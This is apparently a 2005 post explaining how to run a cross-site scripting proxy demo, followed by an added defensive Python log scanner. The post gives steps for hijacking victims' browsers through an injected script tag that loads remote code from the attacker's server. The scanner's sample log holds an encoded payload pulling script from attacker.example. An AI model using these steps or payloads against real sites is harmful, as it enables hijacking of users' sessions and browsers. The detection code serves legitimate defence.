I have uploaded my demo code from Shmoocon 2005. I'll be putting up a more descriptive page, instructions, a whitepaper and the Shmoocon slides over the next few days.
Here's an overview of using the tool:
1 - Modify the Perl script variables $code_server and $PORT to point to the system you will be running the Perl script on (the defaults are port 80 and http://localhost).
2 - Run the Perl script and point the attack browser at /admin on the server running the script (with the defaults this is http://localhost/admin). This is the attacker admin console.
3 - The initialization URL a victim needs to load is /xss2.js. Your initial XSS vector needs to point back to the Perl server and this filename (e.g. to XSS your own browser with a local code server, enter <script src="http://localhost/xss2.js"></script>).
4 - Once a victim is initialized and in a wait loop, you can either browse the / document of the XSS site and click on links you want the victim to visit and forward back, or enter documents/variables in the associated form inputs...
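A defender-side check added here, not part of the original post or the tool: it scans constructed web-server access-log lines for the kind of initialization vector step 3 describes, a `<script src=...>` injected into a query parameter, and reports the client, the parameter and the script it points at. The log lines, hostnames and function names are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format); not taken from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2005:10:00:01 -0500] "GET /search?q=shmoocon HTTP/1.1" 200 512
10.0.0.7 - - [10/Feb/2005:10:00:02 -0500] "GET /search?q=%3Cscript+src%3D%22http%3A%2F%2Fattacker.example%2Fxss2.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.9 - - [10/Feb/2005:10:00:03 -0500] "GET /page?name=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 128
"""

# Pull the request line out of a CLF entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Match a script tag carrying a src attribute, tolerating odd spacing and quoting.
SCRIPT_SRC_RE = re.compile(
    r'<\s*script[^>]*\bsrc\s*=\s*["\']?\s*(?P<src>[^"\'\s>]+)', re.IGNORECASE)


def find_script_src_injections(log_text):
    """Return (client_ip, parameter, script_src, script_host) for every request
    whose decoded query parameters contain a <script src=...> tag."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl already decoded once; decode again so a double-encoded
            # payload meant to slip past a naive filter is still inspected.
            decoded = unquote_plus(value)
            for s in SCRIPT_SRC_RE.finditer(decoded):
                src = s.group("src")
                host = urlsplit(src).hostname or ""
                hits.append((client_ip, name, src, host))
    return hits


if __name__ == "__main__":
    for ip, param, src, host in find_script_src_injections(SAMPLE_LOG):
        print(f"{ip} injected script from {host or '(relative)'} via parameter {param!r}: {src}")
```

Only the second line is reported; the harmless `<b>` markup in the third line is not a script tag and does not match.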